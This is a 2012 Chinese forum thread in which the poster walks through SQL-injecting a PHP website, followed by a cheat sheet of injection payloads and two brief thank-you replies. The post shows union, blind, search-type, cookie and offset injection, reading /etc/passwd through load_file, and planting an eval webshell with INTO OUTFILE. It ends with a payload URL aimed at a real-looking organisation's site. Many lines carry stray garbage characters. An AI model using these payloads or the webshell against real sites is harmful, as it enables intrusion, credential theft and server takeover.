找回密码
 立即注册
查看: 3830|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~
# z0 v1 h+ ^! F让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
$ {+ Z. S& ?( K# X我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。4 o+ C" ]( f) y1 l
如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
, L+ G+ h* a  e8 }3 l. n+ l; o1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)5 [, E5 r' d! N7 U0 d% p- a4 o4 q
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
) p) y# j/ S9 P' xWarning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
3 Q: F( o+ G2 B- P/ e/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入
, S; o0 j4 N) z3 Q) }$ ]2 v7 s" U$ u                        
9 `: V# [7 E. i' y$ f  Y! Z2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,5 {3 R; e' q6 t+ u2 H5 }( ?' c" m
3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意
4 r# k  v6 a* N* H/ n2 N- a4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息$ t6 R% M: V3 f$ E$ y
5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。. Z) o' j; M5 K: m; s8 T, [
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,9 Z; ]5 s( X% c: h
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。6 Z. |7 t) a& r! b3 J; C) S6 a- D. i
我就用的是第二个思路,
: g5 b2 _! E' o) q$ y( f提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  3 X% d" s: |& X! j
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,; S+ B2 \5 ]8 t# @( @5 E# |
提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
% _, Z5 h) o/ r  a1 A$ h, i2 ?0 _注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。' C/ R# ]; {0 Y0 e6 |4 B& R
7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
  r: f1 F" b  R, h: n2 U是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....* r  }' P2 J4 Q7 X
提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --6 O# C5 W/ Q, U5 K% q+ C! t
然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,
8 f, c! R( j& r& w, J' |调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......
  R  s: X" q* d, v/ O" I' _下面是一些很普遍注入方式资料:1 h7 c  I+ ?/ a
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='
: W) ~% W. j5 D8 l5 z拆半法+ `5 X+ B3 R" D0 ?; {* n) ?
######################################
% x4 t4 y$ ?/ Hand exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。9 p0 p' s7 m% ~' o% T
and exists (select * from admin)
5 V) L) u5 L. y0 z3 r9 F. o' v9 ?and exists(select id from admin)
& W9 J0 e  S4 H  ~and exists(select id from admin where id=1); J1 P; j% m; M' E# i
and exists(select id from admin where id>1)
7 D2 j3 D5 W' W' _/ X然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围 - f) V* r. C! P' f
and exists (select username from admin)
5 y# k" Q: U/ ~and exists (select password from admin)
$ b) T: l9 f, Jand exists (select id from admin where len(username)<10 and id=1)1 o% W* d1 v% V" r9 _
and exists (select id from admin where len(username)>5 and id=1); W3 T- V% C- Q. k7 a6 Y) o
and exists (select id from admin where len(username)=6 and id=1)8 Q! y0 d8 J6 W4 Y5 ^8 n
and exists (select id from admin where len(password)<10 and id=1); V2 k2 M  W, G4 P
and exists (select id from admin where len(password)>5 and id=1)5 X* z. j, n; j5 r. M5 M
and exists (select id from admin where len(password)=7 and id=1)
3 H. a9 R6 H" Nand (select top 1 asc(mid(username,1,1)) from admin)=973 w% L! ~0 Y3 W' H$ y
返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。6 ]: U; [# e. J) l  G
猜第二位把username,1,1改成username,2,1就可以了。: L6 @/ K9 \2 d2 a' G
猜密码把username改成password就OK了
8 q. G. v! G6 Z$ N& N: x7 J##################################################
) t! A+ k. A3 u3 T搜索型注入/ ~, |9 |; z3 w, E
##################################. V0 Q8 H( K+ L+ V
%' and 1=1 and '%'='
: t, r9 Y' |$ b* C%' and exists (select * from admin) and '%'='7 L% C* V% H# a1 }* A7 j5 [) G( v
%' and exists(select id from admin where id=1) and '%'='
. h. l2 t2 ^: f, p, i- p%' and exists (select id from admin where len(username)<10 and id=1) and '%'='" Y4 X# L8 l3 b* o2 f, u2 j
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='% B" |; }- H$ @
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
2 Q9 B& K9 U0 e这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='
4 x$ w$ j" l5 R# s, S对于MSSQL数据库,后面可以吧 and '%'='换成--
/ i) ~8 K; e. O2 T! {% }还有一点搜索型注入也可以使用union语句。
. G& B/ E6 q5 ]4 i' y+ ]########################################################" x+ ?+ t) [, W8 ]/ `$ g2 i
联合查询。$ @# v) I6 S; W- l# Z( r" e0 t: k
#####################################
5 K, c$ E$ T& porder by 10
# o) g+ K* H9 c$ M$ y0 eand 1=2 union select 1,2,3,4,5,6,7,8,9,10
! n! f7 ]; O; iand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
, `  U) ^! z; S+ n% u: r  y, t' wand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
- `' T$ I3 D% I很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)8 l; G) p* A) q7 u# r
###################################5 Z, c3 ~+ ?5 n1 M% \9 v
cookie注入/ }8 ?& g9 N2 |3 i
###############################
8 Y) s  E' @; e; `http://www.******.com/shownews.asp?id=127/ c1 M* q, u2 F, i6 R6 R
http://www.******.com/shownews.asp1 Q) [4 O4 ?- T
alert(="id="+escape("127"));$ J- }1 w- {- Y; [
alert(="id="+escape("127 and 1=1"));
$ e; o3 S8 k+ [alert(="id="+escape("127 order by 10"));
  \) Y( L/ l  Ralert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));  X% U# h& X! |/ N8 o
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));3 }2 j% ~" h( o% d; E
这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
; Y3 U. ^" Q! _8 Y9 ^: K###################################
) q+ P: F7 r, l( f) j偏移注入5 R# `! H2 M( F% |2 s
###########################################################+ q+ F% b9 l; ~1 }4 t
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
1 @% @7 }% C3 z* \union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
$ L" G, m7 S. P  H1 P/ `union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)3 Q8 _$ V" ~/ e( z7 i
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)  k# X- p: F) B0 U
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
; r( V4 @$ K* ^7 p7 @( e9 D; sunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)/ J) E1 \; D+ Z+ p. d, B
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on
! e9 o6 r) d" k: P, s% P) La.id=d.id)4 d# ], N; U, r
and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
" o3 F" @, n8 G0 ^: Z$ E, e. \7 aand 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) 2 R7 C5 O  K3 H/ e5 \
  - \, p3 h/ B1 t. [2 D7 R) ^" K
============================================================================================================& _% {- V4 s( F6 y* ^0 X' s/ G
1.判断版本
- r7 d1 |4 L# W/ G# P) {and ord(mid(version(),1,1))>51
* Y8 [* x3 |4 U. ]7 U$ s返回正常,说明大于4.0版本,支持ounion查询. N- F% }8 a, r: Y% K
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
9 i! f6 N+ }: v6 E# U+ M% Vand 2=4 union select 1,2,3,4,5,6,7,8,9--/ E! M: o% A9 [. z! R
3.查看数据库版本及当前用户,
4 S0 f% p4 F& d. zand 2=4 union select 1,user(),version(),4,5,6,7,8,9--4 m2 A7 m% b; E" E2 Y  ?+ I
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,
8 S" S6 z. S+ Y9 X, |, X4.判断有没有写权限
* _& X8 n; w8 ?! |) dand (select count(*) from MySQL.user)>0--
! l' {# i- ]0 K) o4 `5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1  i% @3 w# G7 ]3 m7 O) U% O
用不了这个命令,就学习土耳其黑客手法,如下
, U( W6 R, M4 }- Vand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
6 @3 H8 K8 x( Q! I" h) {6.爆表,爆库# p0 |4 `: a# d% E- h
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
. G1 w! _8 g2 _$ u8 q! t7.爆列名,爆表
; m$ F" l  i+ o, v( Y, aand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
  q1 }3 r+ @$ L. ]& c4 T) B/ |8.查询字段数,直接用limit N,1去查询,直接N到报错为止。( W) q  C; }+ ?) r
and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
8 R& u) [  p/ U, o2 _3 j4 b0 ]8 Z# |0 p9.爆字段内容
  h3 Z3 O: l$ h" m9 |and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
: H; Z- R8 i' c  S% v, Shttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表